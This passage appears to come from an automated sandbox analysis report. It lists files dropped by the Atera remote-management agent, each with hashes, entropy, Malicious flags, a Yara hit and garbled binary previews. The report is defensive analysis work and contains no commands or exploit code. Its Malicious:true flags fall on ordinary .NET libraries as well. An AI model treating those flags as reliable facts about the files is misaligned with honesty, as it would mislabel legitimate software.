                                                                                                                                                                                                                                                                                                                                  SHA1:B8B1E37E60C68E7C73D42A7C532E507DAE1B1D4C
                                                                                                                                                                                                                                                                                                                                  SHA-256:B1A7D040D2CFB5DF692BDE7D5C2CEEDE266D9A7B31804658FFBDAAA147E36C39
                                                                                                                                                                                                                                                                                                                                  SHA-512:74C71265D4AA0FE2B409DB33CE40F83D1208F225808AF780DDE72E02ABE1C9BF431630BB9CF2D46E097400DED78D6B9456B41643EE0C5B5C4C3649C5B30B0241
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`.......-....@.................................3...O.... ..0...............((...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.634307366985014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:2TO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08V83Y:2Cn6xYEpYi60k8yI
                                                                                                                                                                                                                                                                                                                                  MD5:72823338F267AE2E3B0ED7AB100DE427
                                                                                                                                                                                                                                                                                                                                  SHA1:C03CC9B7F7B1C2895A8568A3F579F154BADE75B3
                                                                                                                                                                                                                                                                                                                                  SHA-256:C29D08E8169DA52E8027AC9755CE99D81B2882B8A1F55648BBED8DB2A85B2BBC
                                                                                                                                                                                                                                                                                                                                  SHA-512:784F69300FD79F62556D473BD37A21ECFB743B5D063CF49299B35101A8399FC2A6F208D3A656C261180DA2558AC5FC93E397131BA0F9C1A2AE3B410328684B52
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^...........!.................1... ...@....@.. ...............................W....@..................................1..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H........#......................P ......................................O..q.<.P$[p.;a<...Ci......K..!..&.d...FaLJ.....f..........w.E.E........(y...,.Lr..R..........T.z....5..;.. ....&V.=}.... .0.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0................*..0...............*...0...............*...0..........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3265279
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999883690937835
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:Ll701FdcH/laRbTaZtTtjpEkGXPIzdti3:l0DdOdaR/aZtT5GXCdk
                                                                                                                                                                                                                                                                                                                                  MD5:1F6BD7C304C2DD82E98770A1CC016079
                                                                                                                                                                                                                                                                                                                                  SHA1:6DE8817529684D89A13D489A4ABCBB5C43EFCF54
                                                                                                                                                                                                                                                                                                                                  SHA-256:363E92B1472C84182A11EAC15DA2A9FB7AD84F827B3F0908FD427B1F13D3F044
                                                                                                                                                                                                                                                                                                                                  SHA-512:828545952AE610221EDCD90F3B8A584BA0833B2ACDA3A2B89DA6F3A1DB7D5A2EBA0EFE407964257F144081DA544806D12305908356B4ABA3F6E1ADEE1B22E4F5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....+x]Yd.t\......../...AgentPackageTicketing/AgentPackageTicketing.exe....(.......-I........3.Be7.....\.'.tIu.T....+.N3.y}.7A.W.T..tR..B*I...... .....".....W.Un.y...oqe.....).Hd..Q.B.Ea....[..xo..v..G2...[Eu.n.........5..n..p...9. .....e../.........A.....g...a...`9..........tlJ...Wn.C....#..`...`..%.R...L...V.3E..!0"..K=.B.M<.."...#j.}0.'.>Low.....s.=@.i....xY/...y...K:~>.Y|s...e.S.'o./4''VG,......?..~..?J....B.^.t..'j.....}.wB.y.F4d..*t..(.C.q.*ylPh~g,E.r.....; ...@eG>.6.fv)...\Tf.0.k..w-.|...}L../s..x..NL.t+A...q:irN:.{.!&9.K..u^....w.m..Y....hP.....6."...A.v..Q...p.p}n.o1j.8..B.lt_:S.nx*i6&"..}R.G1.v.?@./....C.Z......j.k..ws.L..n.O.u..x...g,...\.n..g.f....>..BT.,.*.~|k..U@..,..0Uk..YL..,08.n[m.:W#.2-='...^....A.Xvf......~.+s....&zJ.<.............~.....<...R%..g.K%..b.e..0l..O.~....t.....>..=.lo]fT...bLf...}M.,...].:...... X..+...}.n.9....@.A.....}..Y..!.48.......}gc.sr.u..n|.s.%j.]<c...RRR.......z"...3...!.....&gM......,.n..?.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):33320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.312502771073403
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:wKg7oYtwr50jYIExIyeVuU2uEpYi60J2p:mtwr2YI6U2P7642p
                                                                                                                                                                                                                                                                                                                                  MD5:097726DA90E126FCC3202F1E386CF2F4
                                                                                                                                                                                                                                                                                                                                  SHA1:E1F8E7B0D399EC568AC2A47E41BB004D1DD2F2E0
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F95244AEE9389AD0EEE52A25F6A9ED67561F504D7EACA085BEA5BE94E12B724
                                                                                                                                                                                                                                                                                                                                  SHA-512:547B6F21E6B8767AF1F4437CC806F5388538C55F9F9269DD7880EE63D1C98785A23EE8361AE46133937D715E5F3499B073A5C0FE7AA6594AA4289C4792ABCFF5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g.........."...0..N...........m... ........@.. ...............................^....`..................................m..O.......4............Z..((..........ll............................................... ............... ..H............text....M... ...N.................. ..`.rsrc...4............P..............@..@.reloc...............X..............@..B.................m......H........4...7...........................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o......s....%.o........o......s...........s....%......io....%o......o........o....o......(....*..0..........r...p... .....r...p.(.....o......(.....o.......(...........s......[o......s....%.o........o .......s!..........s.......i.......%......io".......o....o....(.........o#...*..($...*...0..~.......~....r-..po%...(.....(&.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1537
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0063120500114895
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FV0PH2/+w3VUrPH2/+789y:3sIk7O7RgdjdgFSagFsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:C3CA0AD8FE91D02044029A11A9480B1F
                                                                                                                                                                                                                                                                                                                                  SHA1:1FB4C1063460C48AC77D3D4702697A35727A5E51
                                                                                                                                                                                                                                                                                                                                  SHA-256:B2AED8BAB56D0FDBD1D6F1277A3257DFFBFD107BEB19320C0D1F4DC0E4AD3AEF
                                                                                                                                                                                                                                                                                                                                  SHA-512:50B18B6DD91CB691C8B77AB612A7172CE59881705A52F59880A29A0F81E910A61D3D4506AB53B1F945611AFE079B96A896F3F01442D3B68801B2748C68AE01F6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXco:WB3
                                                                                                                                                                                                                                                                                                                                  MD5:0AA380D46D813D9D8760D0024B7BFF2F
                                                                                                                                                                                                                                                                                                                                  SHA1:4D7800BEE91F2C0D56D5F98698EE08E0388BBA7F
                                                                                                                                                                                                                                                                                                                                  SHA-256:0DBF6EAC2F4AF29D0CABD16A93A832C643AE41370D810A8DC86D6D835CE1B063
                                                                                                                                                                                                                                                                                                                                  SHA-512:B4A3D28CA772FA1C52F1A10CC439881A0BEC75EB59CE94FC577712632DC0D74C83AF644A3DF4337331C7F846D7E465CC2EE84106CA7A543DF1565678E90AE6CD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=29.9

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):112168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179883799509183
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ugssVbDRgWchiMWXRIe0ZMTR8U3XTknAxb2waOn3ybQgLbYpm8GRUdokEWUpj76n:uUpviy8UHTRxrybQgLbGm8FUpjw
                                                                                                                                                                                                                                                                                                                                  MD5:C1EBDAF4F2323F9B2B227D9A4A84F35D
                                                                                                                                                                                                                                                                                                                                  SHA1:D30457F47DF07F2BFCDD782029177342ACFB0CAF
                                                                                                                                                                                                                                                                                                                                  SHA-256:58A489811FE53ACF66D1F1C76D9783CA2C1E18FC2868F8B866205F15F9CABC60
                                                                                                                                                                                                                                                                                                                                  SHA-512:D78BECAA30421F7B633F711328A6ADB260F2223CA598574FD6E72B31C97688144E8BBAD8D4693FF91DC822897A2554B1BB88B90A97A3AC7C248F747C2F1BF9AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g.........." ..0................. ........... ...................................`.....................................O.......8...............((..........L................................................ ............... ..H............text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H.......0...."...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...ta...r...p(,..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):145448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2029182449287
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:nRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhT:R9XeDmzV2yzlhKLFU1lLVp1+2flYFnQy
                                                                                                                                                                                                                                                                                                                                  MD5:9E8C2769ACE2559FDC7795FD818091D1
                                                                                                                                                                                                                                                                                                                                  SHA1:D93777BDF75D83B3B9A5908F26C7BFCFE42D874C
                                                                                                                                                                                                                                                                                                                                  SHA-256:F6DFAD2D77D0DC756D1BB7031F5B1B6AF956E8746576085AD5BE7176A8D58AAD
                                                                                                                                                                                                                                                                                                                                  SHA-512:96EF70F468DAC1FC793FDFC5E48CF92B6DE58CF96241296AA1A90B4B5E3550A78C8AD27255A835BF0E3C7621CEF3D09658D5F0277D43A8067E1239B9A382BA27
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nI..........." ..0.............v$... ...@....... ...............................O....`.................................#$..O....@..|...............((...`......,#..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................W$......H.............................."......................................V!.b.....s&........*..{....*"..}....*..0..Z........(....o'...-.r...ps(...zs......(....o)....+..o*.....o.....o0...o+....o....-....,..o......*........*.$N......J.s,...}.....(-...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(D...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(E...%.(....o"...%.(....o$...%.(....o ...%.o....*..(-...*..{....*"..}....*..{ ...*"..} ...*..{!...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.308769507327884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:uINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgg:nNsii6v/HS0+OJd5gpKm76tgg
                                                                                                                                                                                                                                                                                                                                  MD5:4B1A1E928652EB3F0133D9FE87E6F510
                                                                                                                                                                                                                                                                                                                                  SHA1:D3EEF0BC8753998334446BBB6C506AB93AA96632
                                                                                                                                                                                                                                                                                                                                  SHA-256:BBCC3629B80B18FC2C594B91B938F92DCA78A3075D1CC6D86BCC402C165807B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:1A28F870B2CDC17958D78235A7CF327398807B5F12A237135C5FFC3D64314F0D240BBBE1864EB9C390973F312B197568FACD7024D303D33DE6C49BF483271015
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ....................................@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29224
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.671527172322904
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:8mYaXzmSJL6guJrdvc5tIZmQCaBj4QU3hOTVTDvAGvoOCcdcOFyF606Nyb8E9VFa:ASJh5tIYQzT5zyF60aEpYi60yb
                                                                                                                                                                                                                                                                                                                                  MD5:BF60A5DB36CC3351FD33C1F5CF71F430
                                                                                                                                                                                                                                                                                                                                  SHA1:DBA4BB0833128FB36CB59D7693DE1AF8B2856239
                                                                                                                                                                                                                                                                                                                                  SHA-256:264C8A254022ACEB099CF17AD0D250FA1E25348BFCC345093A195D41C2462E52
                                                                                                                                                                                                                                                                                                                                  SHA-512:26A9CBA97DEAAEEFE0E6016A12DD20A652DAC5E28FDBD4A75C8760A1FC4A9D32E81ACD35C0C064414B8F343AF340001D6BC6F91132B3D26AC0402964E9060182
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p;_f.........." ..0..B..........Na... ........... ....................................@..................................`..S....................J..((........................................................... ............... ..H............text...TA... ...B.................. ..`.rsrc................D..............@..@.reloc...............H..............@..B................0a......H....... 3...-.........../.......2.........................................}.....(......}.......(..... ....(..... ....(.....(....o....*"..(....*..(....*...(.....{....,..+..+.-..{.....o....o....*...0..?.........+..o....,..+..+.-..o....o....,..+..+.-..*.o......,..+..+.-..*..0..J.........(.....(....,..+..+.-2.{.....3#.{....,..+..+.-....s....}.....(.....(....*j....$...s..........(....&*z.{....,..+..+.-..(......(....*..{....*.0...........{.....;.....(....,..+..+.-...}....*.{....,.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):219176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.062860378962767
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:QYq80gPJle2CpcKyudA1+PVtMG8e7sw9CcHvhlO6:QYqqbe2CSod5dtM8ww7P5
                                                                                                                                                                                                                                                                                                                                  MD5:434418DE0D309B514788C355CB46513A
                                                                                                                                                                                                                                                                                                                                  SHA1:6769AF03EA9A137CB86FDB6949D054D41FDFA61D
                                                                                                                                                                                                                                                                                                                                  SHA-256:D7DAD051E962913D8B561B2ADB497D4BA9090CD5CB2140CB24DDF7C087BDD51D
                                                                                                                                                                                                                                                                                                                                  SHA-512:D346CC9A28BF9EAE1F11DDFA9570972F4F4B0101B6D6A020F37521183E6AE19FCEB065D842EBE9EC6CB871654053E6D79ECD02E1DF24DB20468212A4AAA5C010
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j;_f.........." ..0..(...........F... ........... ...............................f....@.................................dF..W....`...............0..((........................................................... ............... ..H............text....&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................F......H........S.......................S.......................................r...p(................s.........*...0...........o.....=3A.o......o......,..+..+.-.....o......(F.....,..+..+.:B......oK...*.o.... 7...@........o.......o.....o.....o........(F.......,..+..+.:t.....{f...,..+..+.-......-\.o........([.......~....(....,..+..+.-5.o........oF........ob.......,..+..+.-.....}f.....&......o.......o....*.o.....\3%.o.......o.......t......(......o....*.o.....]33.o.........1&.o........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):302120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.177209507230591
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:JZ6n5mx115y505H0jIfJMSFk9X0jIfJMSFk9j:XKwJMykwwJMykj
                                                                                                                                                                                                                                                                                                                                  MD5:7B3B0711FC558FCCF1BAD9057BD459D3
                                                                                                                                                                                                                                                                                                                                  SHA1:D9630F792577953D4DBB7FB40779928FF20044E0
                                                                                                                                                                                                                                                                                                                                  SHA-256:0C2ED61F9A5961E94C4430D0A44457331BF0EB27B610CB9ACE9DB60F622AA861
                                                                                                                                                                                                                                                                                                                                  SHA-512:8A35D5E9D9DFE994CA930D627361111A6DA860759EEAAF2ECCA9D15E54981408DC32DB719B58629239348620035F37A86C953A9458B26E1810712F74396B3587
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#.~..........." ..0..l............... ........... ....................................`.....................................O....................t..((..............8............................................ ............... ..H............text....l... ...l.................. ..`.rsrc................n..............@..@.reloc...............r..............@..B.......................H.......<W..lu..............X...........................................V.(......}......}....*..,..{.(..........,..p .@..(................s....(....*.~.......~....(....~.......~....(....*..0..........~.....(.....{.....{...+..(......{.....{3.~.....3..{.....p3.s>...s....%.o ...%.o!...(6...*.{.....{3"r...p.{.....{.....r...p.("...(#...*...0..$.......s$....o%...(&...o'...((......&.....*.................0..6.......r...p.().....-.r...p..q...(*.....q.....(+......&...*.*..........//..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0141792226861375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdGzNFF7ap+5v5OXrRf/2//FicYo4xT:JduPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                                                                  MD5:8F6EB9E75E6A6F0C0D58FB697C10CEDF
                                                                                                                                                                                                                                                                                                                                  SHA1:6944935DFDC33E0C6DB26869BF25EDA85A2622D8
                                                                                                                                                                                                                                                                                                                                  SHA-256:E2B8677434501735FB0233ED0CC2FFEE5BF6FB4387C51DBCB2585A70E42E4F08
                                                                                                                                                                                                                                                                                                                                  SHA-512:A946252B2E3705EAE751A2672D4ADE1499ECEB28C48B4BE6150C4201EE20A7B9A4450C75E06B07F5DAA3528041A566931D988FBD0C2EA90240D61008895BA44A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):215080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.030153597507431
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
